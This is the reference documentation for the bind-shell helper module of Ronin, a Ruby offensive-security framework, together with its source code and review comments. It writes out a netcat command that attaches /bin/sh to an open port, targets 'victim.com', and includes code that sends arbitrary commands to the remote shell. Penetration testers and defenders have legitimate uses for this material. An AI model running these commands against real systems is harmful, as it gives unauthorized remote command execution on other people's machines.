Module: Ronin::Payloads::Helpers::BindShell

Includes:
Shell
Defined in:
lib/ronin/payloads/helpers/bind_shell.rb

Overview

A Payload helper for communicating with TCP/UDP bind-shells.

Example

# Payload definition that loads the bind-shell helper.
ronin_payload do

  # Presumably extends the payload with Helpers::BindShell, whose
  # `extended` hook (listed below) registers the host/port/protocol
  # parameters and the deploy/evacuate callbacks -- confirm against `helper`.
  helper :bind_shell

  cache do
    # ...
  end

end

Usage

On the remote host, start the bind-shell. The easiest way is to use the netcat utility, assuming you can execute commands on that host.

# Listens on port 9999 and attaches /bin/sh to the connection it accepts.
# The listener performs no authentication and the session is not encrypted.
$ nc -l 9999 -e /bin/sh

Configure the payload:

# Sample values: host and port must match the listener started above.
# Both parameters are required by the helper (test_set :host / :port).
payload.host = 'victim.com'
payload.port = 9999

Then access the bind-shell.

payload.shell.ls
# => "Documents  Music\t   Public  Templates\nDesktop
Downloads  Pictures  src\t   Videos\n"


Methods included from Shell

#fs_chdir, #fs_chgrp, #fs_chmod, #fs_chown, #fs_copy, #fs_getcwd, #fs_glob, #fs_mkdir, #fs_mktemp, #fs_move, #fs_read, #fs_readdir, #fs_rmdir, #fs_stat, #fs_unlink, #fs_write, #process_exit, #process_getenv, #process_getgid, #process_getuid, #process_kill, #process_setenv, #process_spawn, #process_time, #process_unsetenv

Class Method Details

.extended(base) ⇒ Object


# File 'lib/ronin/payloads/helpers/bind_shell.rb', line 68

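# Hook run when this helper is mixed into a payload with +extend+.
#
# Registers the connection parameters (+host+, +port+, +protocol+), the
# validation tests for them, and the deploy/evacuate callbacks that open
# and close the socket kept in +@bind_shell+.
#
# The socket is a plain TCP or UDP socket. Nothing in this block adds
# authentication or encryption, so commands and their output cross the
# network in cleartext.
#
# @param base [Object] the payload object being extended
def self.extended(base)
  base.instance_eval do
    # The host the bind-shell is running on
    parameter :host, type: String,
                     description: 'Host to connect to'

    # The port the bind-shell is listening on
    parameter :port, type: Integer,
                     description: 'Port to connect to'

    # The protocol to use (tcp/udp)
    parameter :protocol, default: :tcp,
                         description: 'Protocol to connect with'

    test_set :host
    test_set :port
    test_in :protocol, [:tcp, :udp]

    deploy do
      @bind_shell = case self.protocol
                    when :tcp
                      TCPSocket.new(self.host, self.port)
                    when :udp
                      # UDPSocket.new takes an address family, not host/port
                      # (passing both raises ArgumentError), so create the
                      # socket first and then set its default destination.
                      # The default family is AF_INET; IPv6 hosts are not
                      # handled here.
                      UDPSocket.new.tap do |sock|
                        sock.connect(self.host, self.port)
                      end
                    else
                      # Fail with a clear message instead of calling +new+
                      # on nil if validation was skipped or bypassed.
                      raise ArgumentError,
                            "unsupported protocol: #{self.protocol.inspect}"
                    end
    end

    evacuate do
      # Close only a socket that exists and is still open, then drop the
      # reference so a later deploy starts clean.
      @bind_shell.close if @bind_shell && !@bind_shell.closed?
      @bind_shell = nil
    end
  end
end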

Instance Method Details

#shell_exec(program, *arguments) {|line| ... } ⇒ Object

Send a command to the bind-shell and process the output.

Yields:

  • (line)

    Each line of output received from the bind-shell will be yielded.

Yield Parameters:

  • line (String)

    A line of output from the shell.

Since:

  • 1.0.0


# File 'lib/ronin/payloads/helpers/bind_shell.rb', line 122

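# Sends a command to the bind-shell and yields each line of its output.
#
# The command is wrapped between two marker lines (MD5 hex digests of a
# random nonce and of nonce + 1) that the remote shell echoes before and
# after running it. Only the lines between the markers are yielded.
#
# Review notes:
# * +program+ and +arguments+ are joined with single spaces and sent
#   without quoting, so whitespace and shell metacharacters in them are
#   interpreted by the remote shell.
# * Everything read back is controlled by the remote host. The debug log
#   uses String#dump, which escapes control characters; the yielded line
#   is raw, so callers should escape it before writing it to a terminal
#   or log.
# * The markers only frame the stream and are not an integrity check. A
#   line equal to the stop marker ends the read, and a connection that
#   closes before the stop marker ends it silently, so truncated output
#   cannot be told apart from complete output here.
#
# @param program [String] the program to run
# @param arguments [Array] additional arguments, joined with spaces
# @yield [line] each line of output received from the bind-shell
# @yieldparam line [String] a line of output with the line ending removed
def shell_exec(program,*arguments)
  command = [program, *arguments].join(' ')

  # generate a random nonce for the command delimiters
  nonce = rand(1_000_000) + 10_000_000

  start = Digest::MD5.hexdigest(nonce.to_s)
  stop  = Digest::MD5.hexdigest((nonce + 1).to_s)

  print_debug "[#{self.host}:#{self.port}] Sending command: #{command}"

  # send the command
  @bind_shell.puts("echo #{start}; (#{command}); echo #{stop}")

  # discard everything up to and including the start marker
  @bind_shell.each_line { |line| break if line.chomp == start }

  @bind_shell.each_line do |line|
    line.chomp!

    # EOS reached
    break if line == stop

    print_debug "[#{self.host}:#{self.port}]   #{line.dump}"

    # Without a block the output is still drained up to the stop marker,
    # so the next command does not read this command's leftovers. A bare
    # yield would raise LocalJumpError mid-stream instead.
    yield line if block_given?
  end

  print_debug "[#{self.host}:#{self.port}] Command finished: #{command}"
end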

#shell_write(data) ⇒ Integer

Writes data to the bind shell.

Since:

  • 1.0.0


# File 'lib/ronin/payloads/helpers/bind_shell.rb', line 165

# Writes raw data to the bind-shell socket.
#
# The data is passed to the socket's +write+ unchanged: no line ending is
# appended and nothing is escaped.
#
# @param data [String] the data to send
# @return [Integer] the value returned by the socket's +write+
def shell_write(data)
  bytes_written = @bind_shell.write(data)
  bytes_written
end